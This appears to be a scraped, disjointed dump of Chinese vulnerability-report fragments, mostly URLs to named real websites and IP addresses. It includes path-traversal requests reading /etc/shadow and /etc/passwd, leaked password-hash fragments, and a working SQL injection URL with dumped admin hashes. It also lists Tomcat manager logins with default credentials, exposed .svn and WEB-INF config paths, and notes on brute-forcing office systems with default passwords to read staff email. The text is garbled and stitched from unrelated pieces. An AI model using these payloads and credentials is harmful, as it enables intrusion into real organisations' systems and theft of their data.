oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin huawei1:x:500:500::/home/huawei1:/bin/bash oracle:x:501:502::/home/oracle:/bin/bash http://www.xtrs.gov.cn/xtzj/new/unitPicFile?unitPicFileName=../../../../../etc/shadow zfplrtUm3sKnl1:15454:0:99999:7 UVFx7qNesYgn0sr5J2dvO0:16443:0:99999:7 http://www.xtrs.gov.cn/xtzj/new/unitPicFile?unitPicFileName=../../../../../etc/hosts http://www.xtrs.gov.cn/xtzj/new/unitPicFile?unitPicFileName=../../../../../root/.bash_history jdbc:oracle:thin:@10.141.136.58:1521:hygeia jdbc:oracle:thin:@172.18.100.108:1521:develop jdbc:oracle:thin:@localhost:1521:orcl jdbc:oracle:thin:@10.141.136.38:1521:czwebcx http://space.caijing.com.cn/.svn/entries http://ucenter.caijing.com.cn/.svn/entries http://www.bnu.edu.cn/ http://szxy.bnu.edu.cn/ http://badmi.qiye001.com/action/mod-android/videoDetailM.action?videoId=707存在命令执行漏洞 http://**.**.**.**/demo/ http://project.weiphp.cn http://project.weiphp.cn/weishi/index.php?s=/addon/WeiSite/WeiSite/index/token/gh_fd7d36352d19/openid/orgF0t29_TBY****qfU.html http://project.weiphp.cn/weishi/index.php?s=/addon/CustomReply/CustomReply/lists.html http://project.weiphp.cn/weishi/index.php?s=/addon/CustomReply/CustomReply/lists/token/gh_fd7d36352d19.html http://**.**.**/pureportal/homepage/gotoHomepage.action http://www.muzhiwan.com/index.php?action=profile&opt=ForgotPassword http://asiantag.com/English/Bs_ProductShow.asp?ArticleID=123 http://en.dgzf.com.cn/English/Bs_ProductShow.asp?ArticleID=228 http://www.zjxzgm.com/english/Bs_ProductShow.asp?ArticleID=305 http://www.whxfgm.com/english/Bs_ProductShow.asp?ArticleID=520 http://www.gdlida.cn/English/Bs_ProductShow.asp?ArticleID=23 http://shequ.fang.com/shop/manager/BangLogin.aspx?city=dl这个是搜房网旗下的社区帮网站,可以看到登陆页面没有验证码 
http://oa.cnpsec.com/indishare/office.nsf/%28frame%29/index,此处可进行爆破,得到某个可用账号后,看到右下角有“用户须知”,里面写着“默认的用户登陆名为用户名字拼音全拼,默认密码为‘111111’”,进入后能够查看中邮证券公司全部员工联系方式,用里面获取的通讯录做成拼音字典,跑出不少账号,账号均能进入办公自动化系统,浏览各种信息,里面包含不少敏感信息。能够进入邮箱查看邮件,查看了一两个邮箱就找到了不少身份信息,未一一查看其他邮箱。 https://github.com/22211127/new72/blob/45079eed2e7b7980455ed349807f698eb4368abf/Fillin1.js http://ebuy.gd.chinamobile.com/estoreSys/login.jsp url:59.175.231.124 http://app.hi.tiancity.com/WEB-INF/web.xml http://app.hi.tiancity.com//WEB-INF/classes/log4j.properties http://**.**.**.**/mainpage/msglog.aspx?user=1 http://**.**.**.**/mainpage/msglog.aspx?user=1 http://**.**.**.**/mainpage/msglog.aspx?user=1 http://**.**.**.**/mainpage/msglog.aspx?user=1 http://**.**.**.**/mainpage/msglog.aspx?user=1 http://**.**.**.**/mainpage/msglog.aspx?user=1 http://**.**.**.**//mainpage/msglog.aspx?user=1 http://**.**.**.**:8888/mainpage/msglog.aspx?user=1 http://**.**.**.**/mainpage/msglog.aspx?user=1 http://**.**.**.**/mainpage/msglog.aspx?user=1 http://**.**.**.**/mainpage/msglog.aspx?user=1 http://**.**.**.**/mainpage/msglog.aspx?user=1 http://**.**.**.**/mainpage/msglog.aspx?user=1 http://**.**.**.**/mainpage/msglog.aspx?user=1 http://**.**.**.**:81/mainpage/msglog.aspx?user=1 http://**.**.**.**/mainpage/msglog.aspx?user=1 http://**.**.**.**/mainpage/msglog.aspx?user=1 http://**.**.**.**:89/mainpage/msglog.aspx?user=1 http://jm.leyou.com.cn/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa\%27and+char%28@%60%27%60%29+/*!50000Union*/+/*!50000SeLect*/+1,2,3,concat%280x3C6162633E,group_concat%280x7C,userid,0x3a,pwd,0x7C%29,0x3C2F6162633E%29,5,6,7,8,9%20from%20%60%23@__admin%60%23%22 admin:f297a57a5a743894a0e4|,|leyou:1e969e759bca932e03df http://jm.leyou.com.cn/web_admin/ http://usercenter.ccibs.cn/claimUser!queryClaims.action?r=1¤tPage=8002存在命令执行漏洞 http://haikehui.haierhouse.com/dkt/webhkh/webCommonAction!goHome.do 
https://github.com/qianshihua/fujian_order_core/blob/9e39fb239dbcaa0c8b7f4a35e4ba2053db8d9119/gx-uni-order/src/main/webapp/WEB-INF/velocity/order/Handle.vm http://esales.10010.com/ http://www.zgxhnyfw.com/Chinese/Bs_jishu.asp?BigClassName=%B4%F3%CC%EF http://www.ahxhnyfw.com/Chinese/Bs_jishu.asp?BigClassName=%B2%A1%BA%A6 http://www.flycom.cn/Chinese/Bs_jishu.asp?BigClassName=%B4%F3%CC%EF http://www.jsxhnyfw.com/Chinese/Bs_jishu.asp?BigClassName=%BB%AF%B7%CA http://www.lnxhnyfw.com/chinese/Bs_jishu.asp?BigClassName=%D0%F3%C4%C1 http://www.zhizunlm.com/zhizunlm.rar ftp://211.157.143.182/ http://61.178.81.162:8888/LQL_OA/login.aspx# https://github.com/ppm10103/MySQLJavaBinlogReplicater/blob/8f9d2f18674dc5c8da1db9f52e398eb4e574f55b/src/cn/ce/utils/mail/Alarm.java http://www.class.cn:80/ www.class.cn ftp://223.4.245.109/web/web/Web.config http://www.ci123.com:80/ www.ci123.com http://myi.vip.com/userbind.html http://**.**.**.**/demo/ http://**.**.**.**/ http://www.guozi.org.cn/web.rar http://user.app.xywy.com/ajax/sendMail.php http://**.**.**.**/bugs/wooyun-2015-0108778而发 http://**.**.**.**/comm_front/public_info/content_channel_list.jsp?class_id=104&class_name=所有信息&pager.offset=150&pager.desc=true http://**.**.**.**/comm_front/public_info/content_channel_list.jsp?class_id=1&class_name=%CB%F9%D3%D0%D0%C5%CF%A2 http://**.**.**.**/comm_front/public_info/content_channel_list.jsp?class_id=73&class_name=%D6%B1%CA%F4%BB%FA%B9%B9 http://**.**.**.**/comm_front/public_info/content_channel_list.jsp?class_id=18&class_name=%C8%CB%CA%C2%D0%C5%CF%A2 http://**.**.**.**/comm_front/public_info/content_channel_list.jsp?class_id=1&class_name=%CB%F9%D3%D0%D0%C5%CF%A2 http://**.**.**.**/comm_front/public_info/content_channel_list.jsp?class_id=18&class_name=人事信息&pager.offset=100&pager.desc=true http://**.**.**.**/comm_front/public_info/content_channel_list.jsp?class_id=18&class_name=人事信息&pager.offset=100&pager.desc=true http://**.**.**.**/comm_front/baixian/tpgl.jsp?chid=9076&org_id=139 
http://**.**.**.**/comm_front/baixian/tpgl.jsp?chid=9076&org_id=139 http://**.**.**.**/comm_front/baixian/tpgl.jsp?chid=9076&org_id=139 http://**.**.**.**/comm_front/baixian/tpgl.jsp?chid=9076&org_id=139 http://**.**.**.**/comm_front/baixian/tpgl.jsp?chid=9076&org_id=139 http://**.**.**.**/comm_front/baixian/tpgl.jsp?chid=9076&org_id=139 http://**.**.**.**/comm_front/baixian/tpgl.jsp?chid=9076&org_id=139 http://123.127.164.54:8088/oa/login.action存在命令执行漏洞 url:http://59.172.182.106:80/manager/html user:admin pass:admin http://shiep.ct-edu.com.cn/learning/entity/first/peTchCoursewareItem_enterTy.action http://yibo.iyiyun.com/Home/Index/getAdList?keywordIds=&page=1&size_id=10&title=1 http://wechat.m.xywy.com/Index/getIll?departid=1 Component:com.UCMobile/com.alipay.sdk.app.H5PayActivity https://mclient.alipay.com/cashierRoutePay.htm http://103.39.77.117/ http://103.39.77.117/3.asp http://www.ztegota.com.cn/,中兴高达 http://www.ztegota.com.cn/sysadmin/login.aspx,kingtopcms,试下admin/toprand,直接就进去了: URL:http://subadmin.cnmo.com http://f.lashou.com/spLogin.php http://111.13.51.105:8080/ http://www.snnu.edu.cn/default.php https://sslvpn.snnu.edu.cn/por/login_psw.csp http://oa.snnu.edu.cn/Home/Login http://door.snnu.edu.cn/Home/Index http://hqdt.snnu.edu.cn/sms http://m.leyou.com.cn/ http://www.muzhiwan.com/index.php?action=article&opt=comment_list 1.www.muzhiwan.com/index.php?action=article&opt=comment_list post:aid=&num=1 2.www.muzhiwan.com/index.php?.exe&action=common&opt=speeddownpc&vid= 3.www.muzhiwan.com/index.php 4.www.muzhiwan.com/index.php?action=common&opt=speeddown&vid= 5.www.muzhiwan.com/index.php?action=game&opt=getAjaxComment post:num=1&vid= http://gsv.muzhiwan.com/index.php?action=detail&opt=getAjaxComment post:num=1&sid= http://i.waimai.meituan.com/ajax/account/getRegisterCode http://www.zhiyingdai.com/receivePassWord/receivepassword_step1.jsp 
https://github.com/qianshihua/terminal-shopping/blob/0dde85d8bf0212a7377e5df5f315832e6410121d/terminal-shopping/terminal-shopping-web-admin/buLu/DataEntry_HN/document/ZJ_ESS.t http://cqetc.chinasofti.com/list.php?c=8 http://redmine.91jinrong.com/ http://lmc.91jinrong.com http://www.91dk.com/ http://www.edai100.com/login/index http://dai-admin-xianzhi.dai68.com/login http://flow.91jinrong.com/login http://cpa.31591.com/login.html http://chexian.31591.com/ http://xuaixu.com/ http://chexian.91jinrong.com/ http://union.91jinrong.com/admin http://bigdata.91jinrong.com http://zzb-admin.91jinrong.com/login http://zzb-admin.91jinrong.com/login http://t.91dk.com/ http://www.newbillion.cn/ http://www.zitian.cn https://www.dnspod.cn/ www.boqii.com/userinfo/User/delAddress/id/736958 http://221.213.100.149/Login url:http://211.152.53.24:80/manager/html user:test pass:test http://211.152.53.24/analytics/struts2/dataonlineLogin.action inurl:contview.aspx?id= http://**.**.**.**/students/ClassInfo.aspx?cls_no= http://**.**.**.**/students/ClassInfo.aspx?cls_no= http://**.**.**.**/students/ClassInfo.aspx?cls_no= http://**.**.**.**/students/ClassInfo.aspx?cls_no= http://**.**.**.**/students/ClassInfo.aspx?cls_no= http://**.**.**.**/students/ClassInfo.aspx?cls_no= http://**.**.**.**/WEB/LearnResource/CouresWareList.aspx?crs_no=0102 http://**.**.**.**/WEB/LearnResource/CouresWareList.aspx?crs_no=0102 http://**.**.**.**/WEB/LearnResource/CouresWareList.aspx?crs_no=0102 http://**.**.**.**/WEB/LearnResource/CouresWareList.aspx?crs_no=0102 http://**.**.**.**/WEB/LearnResource/CouresWareList.aspx?crs_no=0102 http://**.**.**.**/WEB/LearnResource/CouresWareList.aspx?crs_no=0102 http://**.**.**.**/CaiStudy.aspx?cls_no=000001&cai_no=KJ000014 http://**.**.**.**/CaiStudy.aspx?cls_no=000001&cai_no=KJ000014 http://**.**.**.**/CaiStudy.aspx?cls_no=000001&cai_no=KJ000014 http://**.**.**.**/CaiStudy.aspx?cls_no=000001&cai_no=KJ000014 http://**.**.**.**/CaiStudy.aspx?cls_no=000001&cai_no=KJ000014 
http://**.**.**.**/CaiStudy.aspx?cls_no=000001&cai_no=KJ000014 http://**.**.**.**/Admin/StudyExam/StuMessageList.aspx?cls_no=XM000014 http://**.**.**.**/Admin/StudyExam/StuMessageList.aspx?cls_no=XM000014 http://**.**.**.**/Admin/StudyExam/StuMessageList.aspx?cls_no=XM000014 http://**.**.**.**/Admin/StudyExam/StuMessageList.aspx?cls_no=XM000014 http://**.**.**.**/Admin/StudyExam/StuMessageList.aspx?cls_no=XM000014 http://**.**.**.**/Admin/StudyExam/StuMessageList.aspx?cls_no=XM000014 http://**.**.**.**/WEB/message/msgList.aspx?module=2&ptypeid=1 http://**.**.**.**/WEB/message/msgList.aspx?module=2&ptypeid=1 http://**.**.**.**/WEB/message/msgList.aspx?module=2&ptypeid=1 http://**.**.**.**/WEB/message/msgList.aspx?module=2&ptypeid=1 http://**.**.**.**/WEB/message/msgList.aspx?module=2&ptypeid=1 http://**.**.**.**/WEB/message/msgList.aspx?module=2&ptypeid=1 http://**.**.**.**/WEB/DataStat/LearnRecordDetails.aspx?mod=trainproject&cls_no= http://**.**.**.**/WEB/DataStat/LearnRecordDetails.aspx?mod=trainproject&cls_no= http://**.**.**.**/WEB/DataStat/LearnRecordDetails.aspx?mod=trainproject&cls_no= http://**.**.**.**/WEB/DataStat/LearnRecordDetails.aspx?mod=trainproject&cls_no= http://**.**.**.**/WEB/DataStat/LearnRecordDetails.aspx?mod=trainproject&cls_no= http://**.**.**.**/WEB/DataStat/LearnRecordDetails.aspx?mod=trainproject&cls_no= http://**.**.**.**/Admin/Policy/PolicyDownload.aspx?PolicyId=8 http://**.**.**.**/Admin/Policy/PolicyDownload.aspx?PolicyId=8 http://**.**.**.**/Admin/Policy/PolicyDownload.aspx?PolicyId=8 http://**.**.**.**/Admin/Policy/PolicyDownload.aspx?PolicyId=8 http://**.**.**.**/Admin/Policy/PolicyDownload.aspx?PolicyId=8 http://**.**.**.**/Admin/Policy/PolicyDownload.aspx?PolicyId=8 http://**.**.**.**/students/ModifyStuRegInfo.aspx?id=528&cls_no=XM000038&Ctype=1&cls_name=人事系统操作培训班 http://**.**.**.**/students/ModifyStuRegInfo.aspx?id=528&cls_no=XM000038&Ctype=1&cls_name=人事系统操作培训班 
http://**.**.**.**/students/ModifyStuRegInfo.aspx?id=528&cls_no=XM000038&Ctype=1&cls_name=人事系统操作培训班 http://**.**.**.**/students/ModifyStuRegInfo.aspx?id=528&cls_no=XM000038&Ctype=1&cls_name=人事系统操作培训班 http://**.**.**.**/students/ModifyStuRegInfo.aspx?id=528&cls_no=XM000038&Ctype=1&cls_name=人事系统操作培训班 http://**.**.**.**/students/ModifyStuRegInfo.aspx?id=528&cls_no=XM000038&Ctype=1&cls_name=人事系统操作培训班 http://**.**.**/wxcs/sys/loginInput.action http://wificfm.haierubic.com:56688/wificfm/main.html http://kf.liantongcar.com/ http://hyt.mama100.com/hyt/sttlOrderActionviewOrderDetails.action?id=50214097 http://www.35.com http://114.251.242.177/login.jsp pgsd.sysu.edu.cn/guoneijiaoliufinal.asp?id=1721 http://61.148.212.50/Admin/Index/index http://118.213.88.152/ url:http://116.3.0.65:80/manager/html user:admin pass:admin http://v.6.cn/crossdomain.xml http://v.6.cn/user/im/list.php http://v.6.cn/user/im/imMsgLogs.php?tuid=53646313 http://jeary.org/flashCSRF/ContentHijacking.html?objfile=http://jeary.org/flashCSRF/objects/ContentHijacking.swf&objtype=flash&target=http://v.6.cn/user/im/list.php http://jeary.org/flashCSRF/ContentHijacking.html?objfile=http://jeary.org/flashCSRF/objects/ContentHijacking.swf&objtype=flash&target=http://v.6.cn/user/liveorder.php http://gushen.91jinrong.com/bz/index.htm http://www.boqii.com/userinfo/Order/ajaxDelOrder/id/19457540 http://bbs.tompda.com/sendmsg.php?uid=0&tid=2210902&pageid=1&pid=3587934 http://zidian.aies.cn/?id=MzM2OQ== http://cidian.aies.cn/ http://117.57.64.165:1980/Login.action存在命令执行漏洞 url:http://124.238.218.230:80/manager/html user:admin http://www.xbiao.com/compare/ajaxmode?series_id=1169 url:http://218.17.251.228:80/manager/html user:admin pass:admin http://61.138.121.108:8044/yashanmis/xt/login.action存在命令执行漏洞 url:http://219.143.242.95:80/manager/html user:tomcat pass:tomcat http://**.**.**.**/SecondPages/RightInfoList.aspx?InfoType=InfoZWGK1_TZGG http://**.**.**.**/SecondPages/RightInfoList.aspx?InfoType=InfoZXJJ_QKJJ 
http://**.**.**.**/fabu/SecondPages/RightInfoList.aspx?InfoType=infogrb_fwbb http://**.**.**.**/OutPortal_CFD/SecondPages/RightInfoList.aspx?InfoType=infoMLCFD http://118.114.245.44:211/login.aspx?ReturnUrl=%2fYHBSignContractRequest.aspx http://118.114.245.44:211 http://www.cnmo.com/docVote.php http://218.3.140.105/spims/out/login.action命令执行漏洞 lI4y0:15953:0:99999:7 http://www.helloan.cn/process/lend/bids http://www.helloan.cn/process/lend/b http://www.leyou.com.cn/special/promotion/2014/06/mobile-leyou/index http://oa.cnhxcc.com.cn,此处验证码可重用,用常用用户名获得某个账号,进行登陆后,里面含有公司人员通讯录和不少内部资料,用获取的邮箱进行fuzzing,可获得某个登陆数字档案管理系统的账号,进入后里面含有不少敏感资料。 http://www.nxqmcy.gov.cn/web.do?reqCode=docList&type_id=001001005001 http://121.8.226.112:443/gzdms/enterprise/login.action存在命令执行漏洞 url:http://124.128.69.182:80/manager/html user:admin pass:admin http://222.197.183.145/web/dorm/net/login.do http://wechat.m.xywy.com/Index/index/area/2 http://wechat.m.xywy.com/Index/index/area/2%27%20and%20%271%27%20=%20%271 http://wechat.m.xywy.com/Index/index/area/2%27%20and%20%271%27%20=%20%272 http://www.suningcloud.com/ http://www.suningcloud.com/account/getSubCustInfo.htm?subCustId=1XXX www.suningcloud.com http://61.183.9.80/login.action存在命令执行漏洞 http://211.90.246.57/webagent/files/login.jsp https://mail.eyou.net/ http://**.**.**.**/news_info.php?keyno=23 http://**.**.**.**/news_info.php?keyno=206 http://**.**.**.**/news_info.php?keyno=12 http://**.**.**.**/news_info.php?keyno=9 http://**.**.**.**/news_info.php?keyno=42 http://**.**.**.**/news_info.php?keyno=11 http://**.**.**.**/news_info.php?keyno=7 http://**.**.**.**/news_info.php?keyno=14 http://**.**.**.**/news_info.php?keyno=239 http://**.**.**.**/news_info.php?keyno=1 http://**.**.**.**/newsinfo.php?keyno=85 http://**.**.**.**/news_info.php?keyno=11 http://**.**.**.**/newsinfo.php?keyno=10 http://**.**.**.**/news_info.php?keyno=17 http://**.**.**.**/news_info.php?keyno=10 http://**.**.**.**/news_info.php?keyno=11 
http://**.**.**.**/news_info.php?keyno=10 http://**.**.**.**/news_info.php?keyno=23 http://**.**.**.**/news_info.php?keyno=11 http://**.**.**.**/news_info.php?keyno=14 http://**.**.**.**/news_info.php?keyno=299 http://**.**.**.**/news_info.php?keyno=24 http://**.**.**.**/news_info.php?keyno=18 http://**.**.**.**/news_info.php?keyno=6 http://**.**.**.**/news_info.php?keyno=10 http://**.**.**.**/news_info.php?keyno=16 http://**.**.**.**/news_info.php?keyno=31 http://**.**.**.**/news_info.php?keyno=16 http://**.**.**.**/news_info.php?keyno=25 http://**.**.**.**/news_info.php?keyno=1 http://**.**.**.**/news_info.php?keyno=3 http://**.**.**.**/newsinfo.php?keyno=8 http://**.**.**.**/newsinfo.php?keyno=15 http://**.**.**.**/newsinfo.php?keyno=83 http://**.**.**.**/newsinfo.php?keyno=24 http://**.**.**.**/newsinfo.php?keyno=8 http://**.**.**.**/newsinfo.php?keyno=56 http://**.**.**.**/newsinfo.php?keyno=5 http://**.**.**.**/newsinfo.php?keyno=77 http://**.**.**.**/newsinfo.php?keyno=4 http://**.**.**.**/newsinfo.php?keyno=167 http://**.**.**.**/newsinfo.php?keyno=22 http://**.**.**.**/newsinfo.php?keyno=262 http://**.**.**.**/newsinfo.php?keyno=16 http://**.**.**.**/newsinfo.php?keyno=5 http://**.**.**.**/newsinfo.php?keyno=270 http://**.**.**.**/newsinfo.php?keyno=61 http://**.**.**.**/newsinfo.php?keyno=139 http://**.**.**.**/newsinfo.php?keyno=11 http://**.**.**.**/newsinfo.php?keyno=6 http://**.**.**.**/newsinfo.php?keyno=59 http://**.**.**.**/newsinfo.php?keyno=163 http://**.**.**.**/newsinfo.php?keyno=34 http://**.**.**.**/product_info.php?keyno=52720 http://**.**.**.**/Product_info.php?keyno=62585 http://**.**.**.**/product_info.php?keyno=55132 http://**.**.**.**/Product_info.php?keyno=34460 http://**.**.**.**/product_info.php?keyno=13234 http://**.**.**.**/product_info.php?keyno=65025 http://**.**.**.**/product_info.php?keyno=64661 http://**.**.**.**/product_info.php?keyno=13946 http://**.**.**.**/product.php?parentcode=101&classcode=&page=1 
http://**.**.**.**/product.php?parentcode=101&classcode=&page=1 http://**.**.**.**/product.php?parentcode=123&classcode=&page=1 http://**.**.**.**/product.php?parentcode=101&classcode=&page=1 http://**.**.**.**/product.php?parentcode=101&classcode=&page=1 http://124.239.192.65/erp/shadmin/editpage/Admin_Login.asp?action=login http://124.239.192.65/zsjy/zpxx_0.asp?news_id=1 http://www.xlmwifi.com/sellerad/index.php?m=Home&c=Login&a=admin http://dt.syyx.com/login.aspx syyx:syyx http://124.239.192.63 http://shop.xiamenair.com/prolist.aspx?k=a http://shop.xiamenair.com com:8080/ztyb/index.htm http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**//OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**:8888/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**:81/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**:89/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**:8000/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= 
http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**//OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**//OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**//OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**:43651/OpenWindows/Openleibie_wtMc.aspx?id= http://**.**.**.**//OpenWindows/Openleibie_wtMc.aspx?id= http://221.237.157.190/epp/html/nodes/upload/SupdocDo.jsp?areaname=1&supdocname=1&pk_singleplan=1 http://61.175.97.50//epp/html/nodes/upload/SupdocDo.jsp?areaname=1&supdocname=1&pk_singleplan=1 http://218.75.95.158:8081//epp/html/nodes/upload/SupdocDo.jsp?areaname=1&supdocname=1&pk_singleplan=1 http://pr.landsea.cn:9080//epp/html/nodes/upload/SupdocDo.jsp?areaname=1&supdocname=1&pk_singleplan=1 http://123.232.105.202/epp/html/nodes/upload/SupdocDo.jsp?areaname=1&supdocname=1&pk_singleplan=1 http://erp.suning.com.cn/epp/html/nodes/upload/SupdocDo.jsp?areaname=1*&supdocname=1&pk_singleplan=1 http://activecard.zsins.com:7011/iss_dbwebins/bs/bsPrdController.do?method=getPrdouKindList http://activecard.zsins.com:7011/iss_dbwebins/servlet/FileLookServlet?upfileurl=/home/weblogic/webapps/ZheShang/image/6007.jpg http://activecard.zsins.com:7011/iss_dbwebins/servlet/FileLookServlet?upfileurl=/etc/passwd http://www.sdxhsd.com.cn/news/newsDetail.jsp?id=1500035 http://www.baihui.com/.svn/entries http://bjadmin.95081.com/.svn/entries 
http://driver.95081.com/.svn/entries http://daijia.95081.com/.svn/entries http://ychadmin.95081.com/.svn/entries http://123.57.34.173 http://123.57.34.173/myup.aspx(查看源代码) http://123.57.34.173/22.aspx http://www.163disk.com/ https://cos.sfbest.com http://www.firstniu.com/Article/index/id/1.html http://www.weiboyi.com/.svn/entries http://222.221.240.84:7001/ynbi/vfs/public/portals/login/html/login.html http://222.221.240.84:7001/manager/html http://222.221.240.83:7001/ynbi/vfs/public/portals/login/html/login.html http://222.221.240.83:7001/manager/html jdbc:oracle:thin:@172.16.2.50:1521:orcl http://222.221.240.85:8083/Main/AspCode/ZhuChengXu/Login.aspx http://mzw.anquanxia.com/?action=public&opt=login http://ufsdp.ufida.com/(用友集团开发管理部YSDP平台) http://ptcms.csdn.net/article/service/article_count?aid=2819257&jsonpcallback=?&preview=1 http://**.**.**/admin/ http://xp.umeng.com//WEB-INF/classes/springbeans-umeng-dataSource.xml http://xp.umeng.com//WEB-INF/spring/root-context.xml http://xp.umeng.com//WEB-INF/classes/rabbitmq.xml http://xp.umeng.com//WEB-INF/classes/umeng-sso.xml www.fxiaoke.com/h/home/admin www.ycg.com.cn。企业账号可能就是ycg。 www.fxiaoke.com/XV/User/Login员工登陆,可以下载企业文件等等。 http://qqpet.wapsns.3g.qq.com/qqpet/fcgi-bin/invite?sid=xxx www.beva.com/czh/tag/我是注入点 http://city.vivo.com.cn/pc/CheckAll.aspx?actiontype=MoreUpload&pageindex= http://shake.sd.chinamobile.com:18001/console http://205.177.226.84/axis2/ http://www.openimslive.com/axis2/ com:9003 http://www.hengyang.jcy.gov.cn www.csp.gov.cn http://www.huakui.cc www.tyx.cc www.jxedu.cc www.wowoniu.cc www.5558.biz http://www.qdyjkc.com www.qyggzyjy.cn/ http://124.239.192.62/ http://sr.cnooc.com.cn/ http://fk.cscec.com/ http://**.**.**.**/ http://**.**.**.**/emlib4/system/DataSource/DownloadImage.aspx?RUID= http://**.**.**.**/emlib4/system/DataSource/DownloadImage.aspx?RUID= http://**.**.**.**/emlib4/system/DataSource/DownloadImage.aspx?RUID= http://**.**.**.**/emlib4/system/DataSource/DownloadImage.aspx?RUID= 
http://**.**.**.**/emlib4/system/DataSource/DownloadHtml.aspx?RUID= http://**.**.**.**/emlib4/system/DataSource/DownloadHtml.aspx?RUID= http://**.**.**.**/emlib4/system/DataSource/DownloadHtml.aspx?RUID= http://**.**.**.**/emlib4/system/DataSource/DownloadHtml.aspx?RUID= http://**.**.**.**/emlib4/format/release/aspx/EML_VOCAL_xxxx.aspx?ruid=A36E363005A710001 http://**.**.**.**/emlib4/format/release/aspx/EML_VOCAL_xxxx.aspx?ruid=A36E363005A710001 http://**.**.**.**/emlib4/format/release/aspx/EML_VOCAL_xxxx.aspx?ruid=A36E363005A710001 http://**.**.**.**/emlib4/format/release/aspx/EML_VOCAL_xxxx.aspx?ruid=A36E363005A710001 http://**.**.**.**/emlib4/format/release/aspx/JOURNALS_xxxx.aspx?ruid=d8fbf2b00122e00ea http://**.**.**.**/emlib4/format/release/aspx/JOURNALS_xxxx.aspx?ruid=d8fbf2b00122e00ea http://**.**.**.**/emlib4/format/release/aspx/JOURNALS_xxxx.aspx?ruid=d8fbf2b00122e00ea http://**.**.**.**/emlib4/format/release/aspx/JOURNALS_xxxx.aspx?ruid=d8fbf2b00122e00ea http://**.**.**.**/emlib4/format/release/aspx/EML_LANGUAGEL_xxxx.aspx?ruid=A36E43801379B0001 http://**.**.**.**/emlib4/format/release/aspx/EML_LANGUAGEL_xxxx.aspx?ruid=A36E43801379B0001 http://**.**.**.**/emlib4/format/release/aspx/EML_LANGUAGEL_xxxx.aspx?ruid=A36E43801379B0001 http://**.**.**.**/emlib4/format/release/aspx/EML_LANGUAGEL_xxxx.aspx?ruid=A36E43801379B0001 http://**.**.**.**/emlib4/format/release/aspx/disk_xxxx.aspx?RUID=d8a532700259b00ea&wndType=N&desktopID=uncreated http://**.**.**.**/emlib4/format/release/aspx/disk_xxxx.aspx?RUID=d8a532700259b00ea&wndType=N&desktopID=uncreated http://**.**.**.**/emlib4/format/release/aspx/disk_xxxx.aspx?RUID=d8a532700259b00ea&wndType=N&desktopID=uncreated http://**.**.**.**/emlib4/format/release/aspx/disk_xxxx.aspx?RUID=d8a532700259b00ea&wndType=N&desktopID=uncreated http://**.**.**.**/emlib4/format/release/aspx/EML_VIDEO_XXXX.aspx?RUID=17e5b316001412011e&desktopID=uncreated 
http://**.**.**.**/emlib4/format/release/aspx/EML_VIDEO_XXXX.aspx?RUID=17e5b316001412011e&desktopID=uncreated http://**.**.**.**/emlib4/format/release/aspx/EML_VIDEO_XXXX.aspx?RUID=17e5b316001412011e&desktopID=uncreated http://**.**.**.**/emlib4/format/release/aspx/EML_VIDEO_XXXX.aspx?RUID=17e5b316001412011e&desktopID=uncreated http://**.**.**.**/emlib4/format/release/aspx/eml_arts_xxxx.aspx?RUID=1ad97215004c5f011e&desktopID=1bff19620000ad011e http://**.**.**.**/emlib4/format/release/aspx/eml_arts_xxxx.aspx?RUID=1ad97215004c5f011e&desktopID=1bff19620000ad011e http://**.**.**.**/emlib4/format/release/aspx/eml_arts_xxxx.aspx?RUID=1ad97215004c5f011e&desktopID=1bff19620000ad011e http://**.**.**.**/emlib4/format/release/aspx/eml_arts_xxxx.aspx?RUID=1ad97215004c5f011e&desktopID=1bff19620000ad011e http://**.**.**.**/emlib4/format/release/aspx/eml_courseware_xxxx.aspx?RUID=1c11e03b00012fc351&wndType=N&desktopID=uncreated 